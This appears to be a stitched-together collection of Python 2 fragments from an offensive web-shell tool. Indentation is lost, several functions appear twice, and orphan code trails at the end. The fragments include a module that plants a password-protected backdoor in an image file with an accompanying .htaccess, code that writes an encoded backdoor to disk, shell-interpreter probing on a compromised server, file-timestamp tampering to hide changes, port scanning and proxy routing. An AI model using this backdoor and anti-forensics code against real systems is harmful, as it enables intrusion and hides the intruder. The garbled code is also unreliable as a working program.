def __check_pwd(self, password):
if len(password) < 4:
raise ModuleException('generate',
'\'%s\' %s' % (password, WARN_SHORT_PWD))
if ''.join(c for c in password if c not in PERMITTED_CHARS):
raise ModuleException('generate',
'\'%s\' %s' % (password, WARN_CHARS))
def _validate_session_data(self, session_dict):
for sect in default_session:
if not sect in session_dict:
raise ModuleException("session", "%s '%s'" % (WARN_BROKEN_SESS, sect))
for subsect in default_session[sect]:
if not subsect in session_dict[sect]:
raise ModuleException("session", "%s '%s'" % (WARN_BROKEN_SESS, sect))
def _prepare(self):
if not path.isfile(self.args['img']):
raise ModuleException(
self.name, "'%s' %s" % (self.args['img'], WARN_IMG_NOT_FOUND))
if not path.isdir(self.args['ldir']):
try:
mkdir(self.args['ldir'])
except Exception, e:
raise ModuleException(self.name,
"%s %s" % (WARN_DIR_CREAT, str(e)))
def fetch(self):
try:
from BeautifulSoup import BeautifulSoup
except ImportError:
try:
from bs4 import BeautifulSoup
except ImportError:
raise ModuleException('crawler','BeautifulSoup python module required. In Debian-like Linux run:\nsudo apt-get install python-beautifulsoup')
request, handle = self._open()
self._addHeaders(request)
if handle:
try:
data=handle.open(request)
mime_type=data.info().gettype()
url=data.geturl();
if mime_type != "text/html":
raise OpaqueDataException("Not interested in files of type %s" % mime_type,
mime_type, url)
content = unicode(data.read(), "utf-8",
errors="replace")
soup = BeautifulSoup(content)
tags = soup('a')
except urllib2.HTTPError, error:
if error.code == 404:
print >> sys.stderr, "ERROR: %s -> %s" % (error, error.url)
else:
print >> sys.stderr, "ERROR: %s" % error
tags = []
except urllib2.URLError, error:
print >> sys.stderr, "ERROR: %s" % error
tags = []
def __append_bin_data(self, pathfrom, pathto, data):
try:
copy(pathfrom, pathto)
except Exception, e:
raise ModuleException(self.name,
"%s %s" % (WARN_COPY_FAIL, str(e)))
def _probe(self):
try:
file(self.args['lpath'], 'wt').write(self.args['encoded_backdoor'])
except Exception, e:
raise ModuleException(self.name,
"%s %s" % (WARN_WRITING_DATA, str(e)))
def __set_port_ranges(self, given_range):
start_port = None
end_port = None
if given_range.count('-') == 1:
try:
splitted_ports = [ int(strport) for strport in given_range.split('-') if (int(strport) > 0 and int(strport) <= 65535)]
except ValueError:
return None
else:
if len(splitted_ports) == 2:
start_port = splitted_ports[0]
end_port = splitted_ports[1]
else:
try:
int_port = int(given_range)
except ValueError:
return None
else:
start_port = int_port
end_port = int_port
if start_port and end_port:
self.port_list += [ p for p in range(start_port, end_port+1) if p in self.nmap_ports]
else:
raise ModuleException('net.scan', 'Error parsing port numbers \'%s\'' % given_range)
def _prepare(self):
global dateutil
try:
import dateutil.parser
except ImportError, e:
raise ModuleException(
self.name, str(e) + ', install \'dateutil\' python module')
def _dump_session(self, session, session_name):
try:
yaml.dump(session,
open(session_name, 'w'),
default_flow_style=False)
except Exception as e:
raise ModuleException("session", e)
def __check_httpfs(self):
status, output = getstatusoutput('%s --version' %
self.args['httpfs_path'])
if status != 0 or not output:
raise ModuleException(
self.name,
'\'%s\' %s' % (self.args['httpfs_path'], WARN_ERR_RUN_HTTPFS))
def _load_session_by_file(self, session_name, just_return=False):
if not os.path.isfile(session_name):
raise ModuleException('session', WARN_NOT_FOUND)
try:
session_data = yaml.load(open(session_name, 'r').read())
except Exception as e:
raise ModuleException("session", WARN_BROKEN_SESS)
self._validate_session_data(session_data)
if not just_return:
self.sessions[session_name] = session_data
self.current_session_name = session_name
else:
return session_data
def load_session(self, url, password, sessionfile):
if sessionfile:
self._load_session_by_file(sessionfile)
elif url and password:
self._load_session_by_url(url, password)
else:
self._load_fake_session()
if not self.current_session_name:
raise ModuleException("session", WARN_LOAD_ERR)
def __load_rcfile(self, path, default_rcfile=False):
path = os.path.expanduser(path)
if default_rcfile and not os.path.exists(path):
try:
rcfile = open(path, 'w').close()
except Exception, e:
raise ModuleException("",
"Creation '%s' rc file failed" % (path))
else:
return []
def __guess_best_interpreter(self):
if Vector(self.modhandler, "shellprobe", 'shell.sh',
['-just-probe', 'sh']).execute():
# First, probe shell.sh
self.modhandler.interpreter = 'shell.sh'
elif Vector(self.modhandler, "phpprobe", 'shell.php',
['-just-probe', 'php']).execute():
# If other checks fails, probe explicitely php shell. Useful when shell is started directly with :shell.php call
self.modhandler.interpreter = 'shell.php'
else:
# Else declare init failed
raise ModuleException('terminal', 'Interpreter guess failed')
def _load_session_by_file(self, session_name, just_return = False):
parser = ConfigParser()
if not os.path.isfile(session_name):
raise ModuleException('session', WARN_NOT_FOUND)
try:
parser.read(session_name)
except Exception as e:
raise ModuleException("session", WARN_BROKEN_SESS)
self._validate_session_data(parser._sections)
if not just_return:
self.sessions[session_name] = parser._sections
self.current_session_name = session_name
else:
return parser._sections
def __parse_proxy(self, proxyurl):
if proxyurl:
url_dissected = url_dissector.findall(proxyurl)
if url_dissected and len(url_dissected[0]) == 3:
protocol, host, port = url_dissected[0]
if protocol == 'socks5': return (socks.PROXY_TYPE_SOCKS5, host, int(port))
if protocol == 'socks4': return (socks.PROXY_TYPE_SOCKS4, host, int(port))
if protocol.startswith('http'): return (socks.PROXY_TYPE_HTTP, host, int(port))
raise ModuleException('request',WARN_UNCORRECT_PROXY)
return []
def __guess_best_interpreter(self):
# Run an empty command on shell.sh, to trigger first probe and load correct vector
self.modhandler.load('shell.php').run(' ')
if self.modhandler.load('shell.php').stored_args_namespace['mode']:
self.modhandler.interpreter = 'shell.php'
self.modhandler.load('shell.sh').run(' ')
if self.modhandler.load(
'shell.sh').stored_args_namespace['vector']:
self.modhandler.interpreter = 'shell.sh'
if not self.modhandler.interpreter:
raise ModuleException('terminal', 'Interpreter guess failed')
def _dump_session(self, session, session_name):
parser = ConfigParser()
for section in session:
parser.add_section(section)
for key in session[section]:
parser.set(section, key, session[section][key])
try:
parserfile = open(session_name,'w')
parser.write(parserfile)
except Exception as e:
raise ModuleException("session", e)
def _probe(self):
filepath, filename = path.split(self.args['img'])
fileext = filename.split('.')[-1]
path_img2 = path.join(self.args['ldir'], filename)
oneline_backdoor = Backdoor(self.args['pass']).backdoor.replace(
'\n', ' ')
self.__append_bin_data(self.args['img'], path_img2, oneline_backdoor)
path_htaccess = path.join(self.args['ldir'], '.htaccess')
try:
open(path_htaccess, "w+").write(htaccess_template % fileext)
except Exception, e:
raise ModuleException(self.name,
"%s %s" % (WARN_WRITING_DATA, str(e)))
def _prepare_vector(self):
self.formatted_args['rpath'] = self.args['rpath']
if self.args['oldest'] == True:
# get oldest timestamp
self.formatted_args['epoch_time'] = self.__get_oldest_ts(self.args['rpath'])
elif self.args['epoch']:
self.formatted_args['epoch_time'] = float(self.args['epoch'])
elif self.args['ref']:
self.formatted_args['epoch_time'] = self.__get_epoch_ts(self.args['ref'])
elif self.args['time']:
self.formatted_args['epoch_time'] = int(time.mktime(dateutil.parser.parse(self.args['time'], yearfirst=True).timetuple()))
else:
raise ModuleException(self.name, 'Too few arguments, specify -time or -ref or -oldest')
def __slacky_probe(self):
rand = str(random.randint(11111, 99999))
slacky_formats = self.formatted_args.copy()
slacky_formats['cmd'] = 'echo %s' % (rand)
if self.current_vector.execute(slacky_formats) == rand:
self.stored_args_namespace['vector'] = self.current_vector.name
# Set as best interpreter
#self.modhandler.interpreter = self.name
if self.args['just_probe']:
self._result = True
raise ProbeSucceed(self.name, MSG_SH_INTERPRETER_SUCCEED)
return
raise ModuleException(self.name, WARN_SH_INTERPRETER_FAIL)
class Img(Module):
"""Backdoor existing image and create related .htaccess"""
def _set_args(self):
self.argparser.add_argument('pass', help='Password')
self.argparser.add_argument('img', help='Input image path')
self.argparser.add_argument(
'ldir',
help='Dir where to save modified image and .htaccess',
default='bd_output',
nargs='?')
def __append_bin_data(self, pathfrom, pathto, data):
try:
copy(pathfrom, pathto)
except Exception, e:
raise ModuleException(self.name, "%s %s" % (COPY_FAIL, str(e)))
try:
open(pathto, "ab").write(data)
except Exception, e:
raise ModuleException(self.name,
"%s %s" % (WARN_WRITING_DATA, str(e)))
vectors = []
if 'vector' in self.args and self.args['vector']:
selected_vector = self.vectors.get(self.args['vector'])
if selected_vector:
vectors = {self.args['vector']: selected_vector}
else:
vectors = self.vectors
try:
for vector in vectors.values():
try:
self.current_vector = vector
self.formatted_args = {}
self._prepare_vector()
self._execute_vector()
self._verify_vector_execution()
except ProbeSucceed, e:
setattr(
self.stored_args_namespace, 'vector', self.current_vector.name)
raise
except ExecutionException:
pass
except ProbeException, e:
raise ModuleException(self.name, e.error)
